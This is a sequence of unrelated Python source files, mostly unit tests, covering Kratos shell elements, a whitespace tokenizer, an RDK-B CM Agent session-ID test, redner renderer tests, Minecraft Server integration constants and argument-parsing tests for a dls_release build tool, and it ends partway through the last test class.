mp.CreateNewNode(8, -0.01, 0.52, -0.05)
mp.CreateNewNode(9, -0.49, -0.0, 0.0)
def _create_elements(self,mp,element_name):
if element_name.endswith("4N"): # Quadrilaterals
mp.CreateNewElement(element_name, 1, [1,6,5,9], mp.GetProperties()[1])
mp.CreateNewElement(element_name, 2, [6,2,7,5], mp.GetProperties()[1])
mp.CreateNewElement(element_name, 3, [5,7,3,8], mp.GetProperties()[1])
mp.CreateNewElement(element_name, 4, [9,5,8,4], mp.GetProperties()[1])
else: # Triangles
mp.CreateNewElement(element_name, 1, [1,2,5], mp.GetProperties()[1])
mp.CreateNewElement(element_name, 2, [2,3,5], mp.GetProperties()[1])
mp.CreateNewElement(element_name, 3, [3,4,5], mp.GetProperties()[1])
mp.CreateNewElement(element_name, 4, [4,1,5], mp.GetProperties()[1])
def _apply_dirichlet_BCs(self,mp):
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_X, True, mp.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_Y, True, mp.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_Z, True, mp.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.ROTATION_X, True, mp.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.ROTATION_Y, True, mp.Nodes)
KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.ROTATION_Z, True, mp.Nodes)
def _apply_neumann_BCs(self,mp):
for node in mp.Nodes:
node.SetSolutionStepValue(StructuralMechanicsApplication.POINT_LOAD,0,[6.1,-5.5,8.9])
mp.CreateNewCondition("PointLoadCondition3D1N",1,[node.Id],mp.GetProperties()[1])
def _apply_material_properties(self,mp):
#define properties
mp.GetProperties()[1].SetValue(KratosMultiphysics.YOUNG_MODULUS,100e3)
mp.GetProperties()[1].SetValue(KratosMultiphysics.POISSON_RATIO,0.3)
mp.GetProperties()[1].SetValue(KratosMultiphysics.THICKNESS,1.0)
mp.GetProperties()[1].SetValue(KratosMultiphysics.DENSITY,1.0)
g = [0,0,0]
mp.GetProperties()[1].SetValue(KratosMultiphysics.VOLUME_ACCELERATION,g)
cl = StructuralMechanicsApplication.LinearElasticPlaneStress2DLaw()
mp.GetProperties()[1].SetValue(KratosMultiphysics.CONSTITUTIVE_LAW,cl)
def _solve(self,mp):
#define a minimal newton raphson solver
linear_solver = KratosMultiphysics.SkylineLUFactorizationSolver()
builder_and_solver = KratosMultiphysics.ResidualBasedBlockBuilderAndSolver(linear_solver)
scheme = KratosMultiphysics.ResidualBasedIncrementalUpdateStaticScheme()
convergence_criterion = KratosMultiphysics.ResidualCriteria(1e-14,1e-20)
max_iters = 20
compute_reactions = True
reform_step_dofs = True
calculate_norm_dx = False
move_mesh_flag = True
strategy = KratosMultiphysics.ResidualBasedLinearStrategy(mp,
scheme,
linear_solver,
builder_and_solver,
compute_reactions,
reform_step_dofs,
calculate_norm_dx,
move_mesh_flag)
strategy.SetEchoLevel(0)
strategy.Check()
strategy.Solve()
def _check_results(self,node,displacement_results, rotation_results):
#check that the results are exact on the node
disp = node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT)
self.assertAlmostEqual(disp[0], displacement_results[0], 10)
self.assertAlmostEqual(disp[1], displacement_results[1], 10)
self.assertAlmostEqual(disp[2], displacement_results[2], 10)
rot = node.GetSolutionStepValue(KratosMultiphysics.ROTATION)
self.assertAlmostEqual(rot[0], rotation_results[0], 10)
self.assertAlmostEqual(rot[1], rotation_results[1], 10)
self.assertAlmostEqual(rot[2], rotation_results[2], 10)
def execute_shell_test(self, current_model,element_name, displacement_results, rotation_results, do_post_processing):
mp = current_model.CreateModelPart("solid_part")
mp.SetBufferSize(2)
self._add_variables(mp)
self._apply_material_properties(mp)
self._create_nodes(mp,element_name)
self._add_dofs(mp)
self._create_elements(mp,element_name)
#create a submodelpart for dirichlet boundary conditions
bcs_dirichlet = mp.CreateSubModelPart("BoundaryCondtionsDirichlet")
bcs_dirichlet.AddNodes([1,2,4])
#create a submodelpart for neumann boundary conditions
bcs_neumann = mp.CreateSubModelPart("BoundaryCondtionsNeumann")
bcs_neumann.AddNodes([3])
self._apply_dirichlet_BCs(bcs_dirichlet)
self._apply_neumann_BCs(bcs_neumann)
self._solve(mp)
self._check_results(mp.Nodes[3],displacement_results, rotation_results)
if do_post_processing:
self.__post_process(mp)
def test_thin_shell_triangle(self):
element_name = "ShellThinElementCorotational3D3N"
displacement_results = [0.0002324779832 , -0.0002233435997 , 0.0002567143455]
rotation_results = [0.0003627433341 , -0.0001926662603 , -0.0004682681704]
current_model = KratosMultiphysics.Model()
self.execute_shell_test(current_model,
element_name,
displacement_results,
rotation_results,
False) # Do PostProcessing for GiD?
def test_thick_shell_triangle(self):
element_name = "ShellThickElementCorotational3D3N"
displacement_results = [7.18997182e-05 , -0.0001572802804 , 0.0005263940488]
rotation_results = [0.0003316612014 , -0.0002798472414 , 5.141506e-07]
current_model = KratosMultiphysics.Model()
self.execute_shell_test(current_model,
element_name,
displacement_results,
rotation_results,
False) # Do PostProcessing for GiD?
def test_thin_shell_quadrilateral(self):
element_name = "ShellThinElementCorotational3D4N"
displacement_results = [0.0021909310921 , -0.0021683746759 , 0.0007191338749]
rotation_results = [0.0028191154606 , 0.0008171818407 , -0.0069146010725]
current_model = KratosMultiphysics.Model()
self.execute_shell_test(current_model,
element_name,
displacement_results,
rotation_results,
False) # Do PostProcessing for GiD?
def test_thick_shell_quadrilateral(self):
element_name = "ShellThickElementCorotational3D4N"
displacement_results = [0.0003572969872 , -0.0006341259132 , 0.00127807995001]
rotation_results = [0.0012082600485 , -0.0004098356773 , -0.0011673798349]
current_model = KratosMultiphysics.Model()
self.execute_shell_test(current_model,
element_name,
displacement_results,
rotation_results,
False) # Do PostProcessing for GiD?
def __post_process(self, main_model_part):
from gid_output_process import GiDOutputProcess
self.gid_output = GiDOutputProcess(main_model_part,
"gid_output",
KratosMultiphysics.Parameters("""
{
"result_file_configuration" : {
"gidpost_flags": {
"GiDPostMode": "GiD_PostBinary",
"WriteDeformedMeshFlag": "WriteUndeformed",
"WriteConditionsFlag": "WriteConditions",
"MultiFileFlag": "SingleFile"
},
"nodal_results" : ["DISPLACEMENT", "ROTATION", "POINT_LOAD"],
"gauss_point_results" : ["GREEN_LAGRANGE_STRAIN_TENSOR","CAUCHY_STRESS_TENSOR"]
}
}
""")
)
self.gid_output.ExecuteInitialize()
self.gid_output.ExecuteBeforeSolutionLoop()
self.gid_output.ExecuteInitializeSolutionStep()
self.gid_output.PrintOutput()
self.gid_output.ExecuteFinalizeSolutionStep()
self.gid_output.ExecuteFinalize()
if __name__ == '__main__':
KratosUnittest.main()
| StarcoderdataPython |
6620051 | <gh_stars>1-10
import pytest
from ...tests.common_tests import OperatorTestTemplate, ParamTuple
from ..whitespace_tokenizer import WhiteSpaceTokenizer
class TestWhiteSpaceTokenizer(OperatorTestTemplate):
params = [
ParamTuple(
"a \t \t \nb c",
[1, 0, 0, 0, 0, 0, 0, 2, 0, 3],
["a", "b", "c"],
[1, 2, 3],
id='eng',
),
ParamTuple(
" a \t \t \nb c\n\r",
[0, 0, 1, 0, 0, 0, 0, 0, 0, 2, 0, 3, 0, 0],
["a", "b", "c"],
[1, 2, 3],
id='eng with whitespace at head and tail',
),
ParamTuple(
"GB亂入",
[2, 2, 2, 2],
["GB亂入"],
[2],
id='zh',
),
ParamTuple(
"",
[],
[],
[],
id='empty string',
),
]
@pytest.fixture(scope='class')
def op(self):
return WhiteSpaceTokenizer()
def test_equal(self, op):
assert WhiteSpaceTokenizer() == op
| StarcoderdataPython |
12855513 | <filename>testscripts/RDKB/component/CMAgent/TS_CMAGENT_SetSessionId.py
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2016 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>15</version>
<name>TS_CMAGENT_SetSessionId</name>
<primitive_test_id/>
<primitive_test_name>CMAgent_SetSessionId</primitive_test_name>
<primitive_test_version>5</primitive_test_version>
<status>FREE</status>
<synopsis>TC_CMAGENT_1 - Set Session ID API Validation</synopsis>
<groups_id>4</groups_id>
<execution_time>1</execution_time>
<long_duration>false</long_duration>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_CMAGENT_1</test_case_id>
<test_objective>To Validate "Set Session ID" Function of CM Agent</test_objective>
<test_type>Positive</test_type>
<test_setup>XB3</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state else invoke cosa_start.sh manually that includes all the ccsp components and TDK Component"
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>None</api_or_interface_used>
<input_parameters>Json Interface:
API Name
CMAgent_SetSessionId
Input
1.sessionId as 0
2.pathname (Device.X_CISCO_COM_CableModem.)
3.override as 0 (This parameter will enable the reading of current session id and check set session id api with value read)
4. priority as 0</input_parameters>
<automation_approch>1.Configure the Function info in Test Manager GUI which needs to be tested
(CMAgent_SetSessionId - func name - "If not exists already"
cmagent - module name
Necessary I/P args as Mentioned in Input)
2.Python Script will be generated/overrided automically by Test Manager with provided arguments in configure page (TS_CMAGENT_SetSessionId.py)
3.Execute the generated Script(TS_CMAGENT_SetSessionId.py) using excution page of Test Manager GUI
4.cmagentstub which is a part of TDK Agent process, will be in listening mode to execute TDK Component function named CMAgent_SetSessionId through registered TDK cmagentstub function along with necessary Entry Values as arguments
5.CMAgent_SetSessionId function will call CCSP Base Interface Function named CcspBaseIf_SendcurrentSessionIDSignal, that inturn will call "CcspCcMbi_CurrentSessionIdSignal" along with provided input arguments to assign session id to global value of CM Agent
6.Responses(printf) from TDK Component,Ccsp Library function and cmagentstub would be logged in Agent Console log based on the debug info redirected to agent console
7.cmagentstub will validate the available result (from agent console log and Pointer to instance as non null ) with expected result (Eg:"Session ID assigned Succesfully") and the same is updated in agent console log
8.TestManager will publish the result in GUI as PASS/FAILURE based on the response from cmagentstub</automation_approch>
<except_output>CheckPoint 1:
Session ID assigned log from DUT should be available in Agent Console Log
CheckPoint 2:
TDK agent Test Function will log the test case result as PASS based on API response
CheckPoint 3:
TestManager GUI will publish the result as PASS in Execution page</except_output>
<priority>High</priority>
<test_stub_interface>None</test_stub_interface>
<test_script>TS_CMAGENT_SetSessionId</test_script>
<skipped>No</skipped>
<release_version/>
<remarks/>
</test_cases>
<script_tags/>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("cmagent","RDKB");
#IP and Port of box, No need to change,
#This will be replaced with corresponding Box Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_CMAGENT_SetSessionId');
#Get the result of connection with test component and STB
loadModuleresult =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadModuleresult;
loadStatusExpected = "SUCCESS"
if loadStatusExpected not in loadModuleresult.upper():
print "[Failed To Load CM Agent Stub from env TDK Path]"
print "[Exiting the Script]"
exit();
#Primitive test case which associated to this Script
tdkTestObj = obj.createTestStep('CMAgent_SetSessionId');
#Input Parameters
tdkTestObj.addParameter("pathname","Device.X_CISCO_COM_CableModem.");
tdkTestObj.addParameter("priority",0);
tdkTestObj.addParameter("sessionId",0);
tdkTestObj.addParameter("override",0);
expectedresult = "SUCCESS";
#Execute the test case in STB
tdkTestObj.executeTestCase(expectedresult);
#Get the result of execution
actualresult = tdkTestObj.getResult();
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
resultDetails = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution as success
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get the component session Id";
print "EXPECTED RESULT 1: Should get the component session Id";
print "ACTUAL RESULT 1: %s" %resultDetails;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
#Set the result status of execution as failure
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get the component session Id";
print "EXPECTED RESULT 1: Should get the component session Id";
print "ACTUAL RESULT 1: %s" %resultDetails;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
print "[TEST EXECUTION RESULT] : %s" %resultDetails ;
obj.unloadModule("cmagent");
| StarcoderdataPython |
11276956 | <filename>tests/unit_tests.py
import pyredner
import redner
import numpy as np
import torch
def unit_tests():
redner.test_sample_primary_rays(False)
redner.test_scene_intersect(False)
redner.test_sample_point_on_light(False)
redner.test_active_pixels(False)
redner.test_camera_derivatives()
redner.test_d_bsdf()
redner.test_d_bsdf_sample()
redner.test_d_bsdf_pdf()
redner.test_d_intersect()
redner.test_d_sample_shape()
if torch.cuda.is_available():
redner.test_sample_primary_rays(True)
redner.test_scene_intersect(True)
redner.test_sample_point_on_light(True)
redner.test_active_pixels(True)
unit_tests()
| StarcoderdataPython |
8045032 | <filename>homeassistant/components/minecraft_server/const.py<gh_stars>1000+
"""Constants for the Minecraft Server integration."""
ATTR_PLAYERS_LIST = "players_list"
DEFAULT_HOST = "localhost:25565"
DEFAULT_NAME = "Minecraft Server"
DEFAULT_PORT = 25565
DOMAIN = "minecraft_server"
ICON_LATENCY_TIME = "mdi:signal"
ICON_PLAYERS_MAX = "mdi:account-multiple"
ICON_PLAYERS_ONLINE = "mdi:account-multiple"
ICON_PROTOCOL_VERSION = "mdi:numeric"
ICON_STATUS = "mdi:lan"
ICON_VERSION = "mdi:numeric"
ICON_MOTD = "mdi:minecraft"
KEY_SERVERS = "servers"
MANUFACTURER = "Mojang AB"
NAME_LATENCY_TIME = "Latency Time"
NAME_PLAYERS_MAX = "Players Max"
NAME_PLAYERS_ONLINE = "Players Online"
NAME_PROTOCOL_VERSION = "Protocol Version"
NAME_STATUS = "Status"
NAME_VERSION = "Version"
NAME_MOTD = "World Message"
SCAN_INTERVAL = 60
SIGNAL_NAME_PREFIX = f"signal_{DOMAIN}"
SRV_RECORD_PREFIX = "_minecraft._tcp"
UNIT_PLAYERS_MAX = "players"
UNIT_PLAYERS_ONLINE = "players"
UNIT_PROTOCOL_VERSION = None
UNIT_VERSION = None
UNIT_MOTD = None
| StarcoderdataPython |
6652228 | #!/bin/env dls-python
import mock
import unittest
from dls_ade import dls_release
from mock import patch, ANY, MagicMock
from argparse import _StoreAction
from argparse import _StoreTrueAction
def set_up_mock(self, path):
patch_obj = patch(path)
self.addCleanup(patch_obj.stop)
mock_obj = patch_obj.start()
return mock_obj
class ParserTest(unittest.TestCase):
def setUp(self):
self.parser = dls_release.make_parser()
@patch('dls_ade.dls_changes_since_release.ArgParser.add_module_name_arg')
def test_module_name_set(self, parser_mock):
dls_release.make_parser()
parser_mock.assert_called_once_with()
@patch('dls_ade.dls_changes_since_release.ArgParser.add_release_arg')
def test_release_set(self, parser_mock):
dls_release.make_parser()
parser_mock.assert_called_once_with(optional=True)
@patch('dls_ade.dls_changes_since_release.ArgParser.add_branch_flag')
def test_branch_flag_set(self, parser_mock):
dls_release.make_parser()
parser_mock.assert_called_once_with(help_msg="Release from a branch")
@patch('dls_ade.dls_changes_since_release.ArgParser.add_epics_version_flag')
def test_epics_version_flag_set(self, parser_mock):
dls_release.make_parser()
parser_mock.assert_called_once_with(
help_msg="Change the EPICS version. This will determine which "
"build server your job is built on for EPICS modules. "
"Default is from your environment")
def test_force_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-f']
self.assertIsInstance(option, _StoreTrueAction)
self.assertEqual(option.dest, "force")
self.assertIn("--force", option.option_strings)
def test_no_test_build_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-t']
self.assertIsInstance(option, _StoreTrueAction)
self.assertEqual(option.dest, "skip_test")
self.assertIn("--no-test-build", option.option_strings)
def test_local_build_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-l']
self.assertIsInstance(option, _StoreTrueAction)
self.assertEqual(option.dest, "local_build")
self.assertIn("--local-build-only", option.option_strings)
def test_test_build_only_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-T']
self.assertIsInstance(option, _StoreTrueAction)
self.assertEqual(option.dest, "test_only")
self.assertIn("--test_build-only", option.option_strings)
def test_message_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-m']
self.assertIsInstance(option, _StoreAction)
self.assertEqual(option.type, str)
self.assertEqual(option.default, "")
self.assertEqual(option.dest, "message")
self.assertIn("--message", option.option_strings)
def test_next_version_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-n']
self.assertIsInstance(option, _StoreTrueAction)
self.assertEqual(option.dest, "next_version")
self.assertIn("--next_version", option.option_strings)
def test_commit_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-c']
self.assertIsInstance(option, _StoreAction)
self.assertEqual(option.type, str)
self.assertEqual(option.dest, "commit")
self.assertIn("--commit", option.option_strings)
def test_rhel_version_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-r']
self.assertIsInstance(option, _StoreAction)
self.assertEqual(option.type, str)
self.assertEqual(option.dest, "rhel_version")
self.assertIn("--rhel_version", option.option_strings)
def test_windows_option_has_correct_attributes(self):
option = self.parser._option_string_actions['-w']
self.assertIsInstance(option, _StoreAction)
self.assertEqual(option.type, str)
self.assertEqual(option.dest, "windows")
def test_has_windows_option_with_short_name_w_long_name_windows(self):
option = self.parser._option_string_actions['-w']
self.assertIsNotNone(option)
self.assertIn("--windows", option.option_strings)
class TestCreateBuildObject(unittest.TestCase):
def setUp(self):
self.mock_lookup_contact_details = set_up_mock(
self, 'dls_ade.dlsbuild.lookup_contact_details'
)
@patch('dls_ade.dls_release.dlsbuild.default_build')
def test_given_empty_options_then_default_build_called_with_None(self, mock_default):
options = FakeOptions()
dls_release.create_build_object(options)
self.assertTrue(mock_default.called)
mock_default.assert_called_once_with(None)
@patch('dls_ade.dls_release.dlsbuild.default_build')
def test_given_epics_version_then_default_build_called_with_epics_version(self, mock_default):
version = "R3.14.12.3"
options = FakeOptions(epics_version=version)
dls_release.create_build_object(options)
mock_default.assert_called_once_with(version)
@patch('dls_ade.dls_release.dlsbuild.RedhatBuild')
def test_given_rhel_version_then_RedhatBuild_called_with_rhel_and_epics_version(self, mock_default):
rhel_version = "25"
options = FakeOptions(rhel_version=rhel_version)
dls_release.create_build_object(options)
mock_default.assert_called_once_with(rhel_version, None)
@patch('dls_ade.dls_release.dlsbuild.RedhatBuild')
def test_given_rhel_version_then_RedhatBuild_called_with_rhel_and_epics_version(self, mock_build):
rhel_version = "25"
epics_version = "R3.14.12.3"
options = FakeOptions(
rhel_version=rhel_version,
epics_version=epics_version)
dls_release.create_build_object(options)
mock_build.assert_called_once_with(rhel_version,epics_version)
@patch('dls_ade.dls_release.dlsbuild.WindowsBuild')
def test_given_windows_option_without_rhel_then_WindowsBuild_called_with_windows_and_epics_version(self, mock_build):
windows = 'xp'
options = FakeOptions(windows=windows)
dls_release.create_build_object(options)
mock_build.assert_called_once_with(windows, None)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
@patch('dls_ade.dls_release.dlsbuild.Builder.set_area')
def test_given_any_option_then_set_area_called_with_default_area_option(
self, mock_set, _1):
options = FakeOptions()
dls_release.create_build_object(options)
mock_set.assert_called_once_with(options.area)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
@patch('dls_ade.dls_release.dlsbuild.Builder.set_area')
def test_given_area_option_then_set_area_called_with_given_area_option(self, mock_set, _1):
area = 'python'
options = FakeOptions(area=area)
dls_release.create_build_object(options)
mock_set.assert_called_once_with(options.area)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
@patch('dls_ade.dls_release.dlsbuild.Builder.set_force')
def test_given_any_option_then_set_force_called_with_default_force_option(self, mock_set, _1):
options = FakeOptions()
dls_release.create_build_object(options)
mock_set.assert_called_once_with(None)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
@patch('dls_ade.dls_release.dlsbuild.Builder.set_force')
def test_given_force_option_then_set_force_called_with_given_force_option(self, mock_set, _1):
force = True
options = FakeOptions(force=force)
dls_release.create_build_object(options)
mock_set.assert_called_once_with(True)
class TestCheckParsedOptionsValid(unittest.TestCase):
def setUp(self):
self.parser = dls_release.make_parser()
parse_error_patch = patch('dls_ade.dls_release.ArgParser.error')
self.addCleanup(parse_error_patch.stop)
self.mock_error = parse_error_patch.start()
self.args = MagicMock()
self.args.module_name = ""
self.args.release = ""
self.args.next_version = False
def test_given_no_module_name_then_parser_error_specifying_no_module_name(self):
expected_error_msg = 'Module name not specified'
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_msg)
def test_given_no_release_not_test_commit_then_parser_error_called_specifying_no_module_version(self):
self.args.module_name = "build"
self.args.commit = ""
expected_error_msg = 'Module release not specified; required unless'
expected_error_msg += ' testing a specified commit, or requesting'
expected_error_msg += ' next version.'
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_msg)
def test_given_default_area_and_module_of_redirector_then_parser_error_not_called(self):
self.args.module_name = "redirector"
self.args.release = "12"
self.args.area = "support"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.assertFalse(self.mock_error.call_count)
def test_given_git_and_archive_area_else_good_options_then_raise_error(self):
self.args.module_name = "module"
self.args.release = "version"
self.args.area = "archive"
expected_error_message = self.args.area + " area not valid"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_message)
def test_python3_with_rhel_6_raises_error(self):
areas = {"python3", "python3ext"}
for area in areas:
self.args.module_name = "module"
self.args.release = "version"
self.args.rhel_version = "6"
self.args.area = area
expected_error_message = self.args.area + " releases cannot be " \
"made for RHEL6"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_message)
self.mock_error.reset_mock()
def test_python3_with_rhel_7_does_not_raise_error(self):
areas = {"python3", "python3ext"}
for area in areas:
self.args.module_name = "module"
self.args.release = "version"
self.args.rhel_version = "7"
self.args.area = area
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_not_called()
def test_given_git_and_epics_area_else_good_options_then_error_not_raised(self):
self.args.module_name = "module"
self.args.release = "version"
self.args.area = "epics"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.assertFalse(self.mock_error.call_count)
def test_given_git_and_matlab_area_else_good_options_then_error_not_raised(self):
self.args.module_name = "module"
self.args.release = "version"
self.args.area = "matlab"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.assertFalse(self.mock_error.call_count)
def test_given_git_and_etc_area_and_Launcher(self):
self.args.module_name = "Launcher"
self.args.release = "version"
self.args.area = "etc"
self.args.test_only = False
self.args.skip_test = True
self.args.local_build = False
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_not_called()
def test_given_git_and_etc_area_and_init(self):
self.args.module_name = "init"
self.args.release = "version"
self.args.area = "etc"
self.args.test_only = False
self.args.skip_test = True
self.args.local_build = False
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_not_called()
def test_given_etc_area_and_not_skip_local_test_build_then_error(self):
self.args.module_name = "init"
self.args.release = "version"
self.args.area = "etc"
self.args.test_only = False
self.args.local_build = False
self.args.skip_test = False
expected_error_message = \
"Test builds are not possible for etc modules. " \
"Use -t to skip the local test build. Do not use -T or -l."
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_message)
def test_given_etc_area_and_local_test_build_only_then_error(self):
self.args.module_name = "init"
self.args.release = "version"
self.args.area = "etc"
self.args.skip_test = False
self.args.test_only = False
self.args.local_build = True
expected_error_message = \
"Test builds are not possible for etc modules. " \
"Use -t to skip the local test build. Do not use -T or -l."
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_message)
def test_given_etc_area_and_server_test_build_then_error(self):
self.args.module_name = "init"
self.args.release = "version"
self.args.area = "etc"
self.args.skip_test = True
self.args.local_build = False
# Not skip local test build
self.args.test_only = True
expected_error_message = \
"Test builds are not possible for etc modules. " \
"Use -t to skip the local test build. Do not use -T or -l."
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_message)
def test_given_git_and_etc_area_and_invalid_module_then_raise_error(self):
self.args.module_name = "redirector"
self.args.release = "version"
self.args.area = "etc"
self.args.test_only = False
self.args.no_test_build = True
self.args.local_build = False
expected_error_message = \
"The only supported etc modules are ['init', 'Launcher'] - " \
"for others, use configure system instead"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.mock_error.assert_called_once_with(expected_error_message)
def test_given_git_and_tools_area_else_good_options_then_error_not_raised(self):
self.args.module_name = "module"
self.args.release = "version"
self.args.area = "tools"
dls_release.check_parsed_arguments_valid(self.args, self.parser)
self.assertFalse(self.mock_error.call_count)
class TestNextVersionNumber(unittest.TestCase):
def test_given_empty_list_of_releases_then_return_first_version_number(self):
releases = []
expected_version = "0-1"
version = dls_release.next_version_number(releases)
self.assertEqual(version, expected_version)
def test_given_list_of_one_release_then_return_incremented_latest_version_number(self):
releases = ['5-5']
expected_version = '5-6'
version = dls_release.next_version_number(releases)
self.assertEqual(version, expected_version)
def test_given_list_of_complex_releases_then_return_incremented_latest_version_number(self):
releases = ['1-3-5dls7','2-3-5dls7','2-3-4dls8','2-3-5dls8']
expected_version = '2-3-5dls9'
version = dls_release.next_version_number(releases)
self.assertEqual(version, expected_version)
class TestGetLastRelease(unittest.TestCase):
def test_given_list_of_one_release_number_then_return_that_number(self):
releases = ['1-5-3-4']
expected_version = releases[0]
version = dls_release.get_last_release(releases)
self.assertEqual(version, expected_version)
def test_given_list_of_releases_with_diff_major_number_then_return_latest_version(self):
releases = ['1-0', '3-0', '2-0']
expected_version = releases[1]
version = dls_release.get_last_release(releases)
self.assertEqual(version, expected_version)
def test_given_list_of_complex_releases_then_return_latest_version(self):
releases = ['1-3-5dls7', '2-3-5dls7', '2-3-4dls8', '2-3-5dls8']
expected_version = releases[-1]
version = dls_release.get_last_release(releases)
self.assertEqual(version, expected_version)
class TestFormatArgumentVersion(unittest.TestCase):
def test_given_string_arg_with_periods_then_return_same_string_with_dashes(self):
arg_version = '1.4.3dls5'
version = dls_release.format_argument_version(arg_version)
self.assertEqual(len(version), len(arg_version))
self.assertFalse('.' in version)
self.assertEqual(arg_version.split('.'), version.split('-'))
def test_given_empty_string_arg_then_return_empty_string(self):
arg_version = ''
self.assertEqual(arg_version, dls_release.format_argument_version(arg_version))
def test_given_string_arg_with_no_dots_return_same_string(self):
arg_version = '1-4'
self.assertEqual(arg_version, dls_release.format_argument_version(arg_version))
class TestIncrementVersionNumber(unittest.TestCase):
def test_given_single_digit_then_return_incremented_digit(self):
release_number = '4'
expected_number = '5'
incremented_number = dls_release.increment_version_number(release_number)
self.assertEqual(incremented_number, expected_number)
def test_given_two_digit_then_return_number_with_most_minor_digit_incremented(self):
release_number = '4-5'
expected_number = '4-6'
incremented_number = dls_release.increment_version_number(release_number)
self.assertEqual(incremented_number, expected_number)
def test_given_dls_release_number_then_return_with_incremented_most_minor_number(self):
release_number = '4-5dls12'
expected_number = '4-5dls13'
incremented_number = dls_release.increment_version_number(release_number)
self.assertEqual(incremented_number, expected_number)
class TestConstructInfoMessage(unittest.TestCase):
def setUp(self):
self.mock_lookup_contact_details = set_up_mock(
self, 'dls_ade.dlsbuild.lookup_contact_details'
)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
def test_given_default_args_then_construct_specific_string(self, _1):
module = 'dummy'
version = '1-0'
branch = None
area = "support"
options = FakeOptions()
build = dls_release.create_build_object(options)
expected_message = '{module} {version} from tag {version}, '.format(module=module, version=version)
expected_message += 'using {} build server'.format(build.get_server())
expected_message += ' and epics {}'.format(build.epics())
returned_message = dls_release.construct_info_message(
module, branch, area, version, build)
self.assertEqual(expected_message, returned_message)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
def test_given_default_args_and_branch_then_construct_specific_string_referencing_branch(self, _1):
module = 'dummy'
version = '3-5'
branch = 'new_feature'
area = 'support'
options = FakeOptions(branch='new_feature')
build = dls_release.create_build_object(options)
expected_message = \
'{module} {version} from branch {branch}, '.format(module=module, version=version, branch=branch)
expected_message += 'using {} build server'.format(build.get_server())
expected_message += ' and epics {}'.format(build.epics())
returned_message = dls_release.construct_info_message(
module, branch, area, version, build)
self.assertEqual(expected_message, returned_message)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
def test_given_default_args_and_ioc_area_then_construct_specific_string(self, _1):
module = 'dummy'
version = '1-0'
area = 'ioc'
branch = None
options = FakeOptions(area='ioc')
build = dls_release.create_build_object(options)
expected_message = '{module} {version} from tag {version}, '.format(module=module, version=version)
expected_message += 'using {} build server'.format(build.get_server())
expected_message += ' and epics {}'.format(build.epics())
returned_message = dls_release.construct_info_message(
module, branch, area, version, build)
self.assertEqual(expected_message, returned_message)
@patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
